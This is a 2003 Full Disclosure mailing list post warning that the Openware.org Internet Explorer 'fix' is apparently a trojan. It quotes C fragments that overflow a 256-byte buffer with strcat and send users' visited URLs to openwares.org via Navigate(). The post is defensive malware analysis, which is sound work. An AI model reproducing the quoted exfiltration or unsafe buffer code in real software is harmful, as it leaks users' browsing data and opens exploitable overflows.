Full Disclosure mailing list archives
Re: Openware.org IE Fix - Warning
From: petard <petard () freeshell org>
Date: Fri, 19 Dec 2003 14:35:43 +0000
On Fri, Dec 19, 2003 at 01:25:48PM +0100, Thierry wrote:
According to Heise (http://www.heise.de/newsticker/data/dab-19.12.03-002/) The Openware.org IE fix introduces new flaws : - The buffer to copy URL's is limited to 256 bytes - Larger strings produce a buffer overflow, with possibility to overwrite the stack. BoF Test : http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_18.shtml (at the bottom, link entitled "TEST DES PATCHES")
DISCLAIMER: I've only read, not executed this source code! I'd say it's worse than that. From a quick look at the source, I'd say this one may actually be malicious. (Stupid too, but it looks malicious)... In the BeforeNavigateEvent() funcion of IETray.cpp, the URL is first truncated to 256 bytes: char *dest = (char *)malloc(256*sizeof(char)); WideCharToMultiByte( CP_ACP, 0, (BSTR)url->bstrVal, -1, dest, 256, NULL, NULL ); Safe enough, I suppose, though it will likely lead to a sub-optimal browsing experience. Then, if one of the "malicious" characters is found, the allocates and populates the following buffer: char surl[256]; strcpy(surl,"http://www.openwares.org/cgi-bin/exploit.cgi?"); At the end of the function, determining what the "real" and "fake" URLs were, the code unsafely appends them to the buffer: strcat(surl,sFake); strcat(surl,"&"); strcat(surl,sTrue); Copies the result to another string: MultiByteToWideChar( CP_ACP, 0, surl, -1, url, 256 ); And proceeds to send it to the authors of the code (or whomever controls http://www.openwares.org/): m_smtWB->Navigate(url,0,0,0,0); Summary: Not only is there a stupid, possibly exploitable, buffer overflow here, but the place I'm seeing it is in a section of the code whose main purpose appears to be submitting information about what you browse back to the code's authors. I'd say this is malicious... the user is certainly not warned of this prior to downloading the patch. Since I never executed it, I have no idea of whether or not they are warned by an installer. Call it a trojan, call it spyware, but don't execute it. Regards, petard _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Openware.org IE Fix - Warning Thierry (Dec 19)
- Re: Openware.org IE Fix - Warning petard (Dec 19)
- Re: Openware.org IE Fix - Warning Erik van Straten (Dec 19)
- Re[2]: Openware.org IE Fix - Warning phased (Dec 19)
- Re: Openware.org IE Fix - Warning Erik van Straten (Dec 19)
- <Possible follow-ups>
- Re: Openware.org IE Fix - Warning Aaron Horst (Dec 19)
- Re: Openware.org IE Fix - Warning petard (Dec 19)